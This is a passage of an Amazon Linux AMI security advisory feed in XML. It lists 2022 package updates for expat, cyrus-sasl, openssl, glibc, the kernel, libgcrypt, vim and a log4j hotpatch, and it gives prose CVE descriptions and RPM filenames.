arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.75-1.90.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1573</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1573: critical priority package update for expat</title><issued date="2022-03-09 22:48:00" /><updated date="2022-03-10 19:12:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-25236:
A flaw was found in expat. Passing one or more namespace separator characters in the "xmlns[:prefix]" attribute values made expat send malformed tag names to the XML processor on top of expat. This issue causes arbitrary code execution depending on how unexpected cases are handled inside the XML processor.
CVE-2022-25235:
A flaw was found in expat. Passing malformed 2- and 3-byte UTF-8 sequences (for example, from start tag names) to the XML processing application on top of expat can lead to arbitrary code execution. This issue is dependent on how invalid UTF-8 is handled inside the XML processor.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25235" title="" id="CVE-2022-25235" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25236" title="" id="CVE-2022-25236" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-devel" version="2.1.0" release="12.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-12.27.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="12.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-12.27.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="12.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-12.27.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.27.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-12.27.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="12.27.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-12.27.amzn1.i686.rpm</filename></package><package name="expat" version="2.1.0" release="12.27.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-12.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1574</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1574: important priority package update for cyrus-sasl</title><issued date="2022-03-10 00:54:00" /><updated date="2022-03-10 19:11:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-24407:
A flaw was found in the SQL plugin shipped with Cyrus SASL. Failure to properly escape the SQL input allows a remote attacker to execute arbitrary SQL commands. This issue can lead to the escalation of privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24407" title="" id="CVE-2022-24407" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cyrus-sasl-plain" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-plain-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-lib" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-lib-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-gssapi" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-gssapi-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-devel" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-devel-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-debuginfo" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-debuginfo-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-sql" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-sql-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-ntlm" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-ntlm-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-md5" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-md5-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-ldap" version="2.1.23" release="13.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-sasl-ldap-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl" version="2.1.23" release="13.17.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/cyrus-sasl-2.1.23-13.17.amzn1.x86_64.rpm</filename></package><package name="cyrus-sasl-ldap" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-ldap-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-gssapi" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-gssapi-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-md5" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-md5-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-debuginfo" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-debuginfo-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-ntlm" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-ntlm-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-plain" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-plain-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-sql" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-sql-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-devel" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-devel-2.1.23-13.17.amzn1.i686.rpm</filename></package><package name="cyrus-sasl-lib" version="2.1.23" release="13.17.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-sasl-lib-2.1.23-13.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2022-1575</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1575: important priority package update for openssl</title><issued date="2022-03-15 18:54:00" /><updated date="2022-04-26 18:59:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-0778:
The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include:
- TLS clients consuming server certificates
- TLS servers consuming client certificates
- Hosting providers taking certificates or private keys from customers
- Certificate authorities parsing certification requests from subscribers
- Anything else which parses ASN.1 elliptic curve parameters
Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778" title="" id="CVE-2022-0778" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.156.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.156.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.156.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.156.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.156.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.156.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.156.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.156.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.156.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.156.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.156.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.156.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1576</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1576: medium priority package update for glibc</title><issued date="2022-04-04 23:46:00" /><updated date="2022-04-06 21:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23219:
A stack based buffer-overflow vulnerability was found in the deprecated compatibility function clnt_create() in the sunrpc's clnt_gen.c module of the GNU C Library (aka glibc) through 2.34. This vulnerability copies its hostname argument onto the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) lead to arbitrary code execution.
CVE-2022-23218:
A stack based buffer-overflow vulnerability was found in the deprecated compatibility function svcunix_create() in the sunrpc's svc_unix.c module of the GNU C Library (aka glibc) through 2.34. This vulnerability copies its path argument onto the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218" title="" id="CVE-2022-23218" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219" title="" id="CVE-2022-23219" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-static" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="324.189.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-324.189.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="324.189.amzn1" epoch="0" 
arch="i686"><filename>Packages/nscd-2.17-324.189.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="324.189.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-324.189.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="324.189.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-324.189.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="324.189.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-324.189.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="324.189.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-324.189.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="324.189.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-324.189.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="324.189.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-324.189.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="324.189.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-324.189.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="324.189.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-324.189.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1577</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1577: important priority package update for kernel</title><issued date="2022-04-04 23:46:00" /><updated date="2024-08-29 00:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48855:
In the Linux kernel, the following vulnerability has been resolved:
sctp: fix kernel-infoleak for SCTP sockets
CVE-2022-20368:
Product: Android. Versions: Android kernel. Android ID: A-224546354. References: Upstream kernel.
CVE-2022-1016:
A flaw was found in the Linux kernel in net/netfilter/nf_tables_core.c:nft_do_chain, which can cause a use-after-free. The return path must be handled with proper preconditions, as the issue can lead to a kernel information leak triggered by a local, unprivileged attacker.
CVE-2022-1015:
A flaw was found in the Linux kernel in linux/net/netfilter/nf_tables_api.c of the netfilter subsystem. This flaw allows a local user to cause an out-of-bounds write issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1015" title="" id="CVE-2022-1015" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1016" title="" id="CVE-2022-1016" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20368" title="" id="CVE-2022-20368" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48855" title="" id="CVE-2022-48855" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.273" release="140.502.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.273" release="140.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.273-140.502.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="perf" 
version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.273-140.502.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.273" release="140.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.273-140.502.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1578</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1578: medium priority package update for libgcrypt</title><issued date="2022-04-04 23:47:00" /><updated date="2022-04-06 21:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-33560:
A side-channel attack flaw was found in the way libgcrypt implemented Elgamal encryption. This flaw allows an attacker to decrypt parts of ciphertext encrypted using Elgamal, for example, when using OpenPGP. The highest threat from this vulnerability is to confidentiality.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560" title="" id="CVE-2021-33560" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libgcrypt-debuginfo" version="1.5.3" release="12.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-debuginfo-1.5.3-12.20.amzn1.x86_64.rpm</filename></package><package name="libgcrypt-devel" version="1.5.3" release="12.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-devel-1.5.3-12.20.amzn1.x86_64.rpm</filename></package><package name="libgcrypt" version="1.5.3" release="12.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-1.5.3-12.20.amzn1.x86_64.rpm</filename></package><package name="libgcrypt-debuginfo" version="1.5.3" release="12.20.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-debuginfo-1.5.3-12.20.amzn1.i686.rpm</filename></package><package name="libgcrypt-devel" version="1.5.3" release="12.20.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-devel-1.5.3-12.20.amzn1.i686.rpm</filename></package><package name="libgcrypt" version="1.5.3" release="12.20.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-1.5.3-12.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1579</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1579: medium priority package update for vim</title><issued date="2022-04-04 23:48:00" /><updated date="2022-04-06 21:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-0943:
A heap buffer overflow flaw was found in vim's suggest_try_change() function of the spellsuggest.c file. This flaw allows an attacker to trick a user into opening a crafted file, triggering a heap-overflow and causing an application to crash, which leads to a denial of service.
CVE-2022-0729:
A flaw was found in vim. The vulnerability occurs due to crashes within specific regexp patterns and strings and leads to an out-of-range vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0714:
A heap-buffer-overflow flaw was found in vim's win_lbr_chartabsize() function of charset.c file. The issue occurs due to an incorrect 'vartabstop' value. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap-overflow, and can cause an application to crash, eventually leading to a denial of service.
CVE-2022-0696:
A NULL pointer dereference flaw was found in vim's find_ucmd() function of usercmd.c file. This flaw allows an attacker to trick a user into opening a crafted file, triggering a NULL pointer dereference. This issue leads to an application crash, causing a denial of service.
CVE-2022-0685:
A flaw was found in vim. The vulnerability occurs due to a crash when using a special multi-byte character and leads to an out-of-range vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0629:
A stack-based buffer overflow flaw was found in vim's ga_concat_shorten_esc() function of src/testing.c file. This flaw allows an attacker to trick a user into opening a crafted file, triggering a stack-overflow. This issue can lead to an application crash, causing a denial of service.
CVE-2022-0572:
A heap-based buffer overflow flaw was found in vim's ex_retab() function of indent.c file. This flaw occurs when repeatedly using :retab. This flaw allows an attacker to trick a user into opening a crafted file triggering a heap-overflow.
CVE-2022-0554:
A flaw was found in vim that causes an out-of-range pointer offset vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0443:
A flaw was found in vim. The vulnerability occurs due to using freed memory which results in a use-after-free vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0417:
A flaw was found in vim. The vulnerability occurs due to illegal memory access and leads to a heap buffer overflow. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0413:
A flaw was found in vim. The vulnerability occurs due to using freed memory when the substitute uses a recursive function call, resulting in a use-after-free vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0408:
A flaw was found in vim. The vulnerability occurs due to stack corruption when looking for spell suggestions and leads to a stack buffer overflow. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0393:
A flaw was found in vim. The vulnerability occurs due to a crash when recording and using Select mode and leads to an out-of-bounds read. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0393" title="" id="CVE-2022-0393" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0408" title="" id="CVE-2022-0408" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0413" title="" id="CVE-2022-0413" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0417" title="" id="CVE-2022-0417" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0443" title="" id="CVE-2022-0443" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0554" title="" id="CVE-2022-0554" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0572" title="" id="CVE-2022-0572" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0629" title="" id="CVE-2022-0629" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0685" title="" id="CVE-2022-0685" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0696" title="" id="CVE-2022-0696" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0714" title="" id="CVE-2022-0714" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0729" title="" id="CVE-2022-0729" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0943" title="" id="CVE-2022-0943" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-common" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.2.4621-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="8.2.4621" release="1.1.amzn1" epoch="2" 
arch="x86_64"><filename>Packages/vim-enhanced-8.2.4621-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-8.2.4621-1.1.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.2.4621-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-8.2.4621-1.1.amzn1.noarch.rpm</filename></package><package name="vim-debuginfo" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.2.4621-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-8.2.4621-1.1.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-8.2.4621-1.1.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.2.4621-1.1.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.2.4621" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-8.2.4621-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1580</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1580: important priority package update for log4j-cve-2021-44228-hotpatch</title><issued date="2022-04-18 19:44:00" /><updated date="2022-04-19 18:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-0070:
The Apache Log4j hotpatch package starting with log4j-cve-2021-44228-hotpatch-1.1-16 will now explicitly mimic the Linux capabilities and cgroups of the target Java process that the hotpatch is applied to.
In order to mimic the Linux capabilities of the target process, Amazon Linux 1 customers need to be running kernel version 4.14.275-142.503 or later, while Amazon Linux 2 customers on ARM need to be running kernel versions 4.14.275-207.503, 5.4.188-104.359, 5.10.109-104.500 or later. Amazon Linux 2 customers on Intel or AMD instances do not need an updated kernel.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0070" title="" id="CVE-2022-0070" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="log4j-cve-2021-44228-hotpatch" version="1.1" release="16.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-cve-2021-44228-hotpatch-1.1-16.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1581</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1581: important priority package update for kernel</title><issued date="2022-04-18 19:46:00" /><updated date="2022-04-19 18:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-28356:
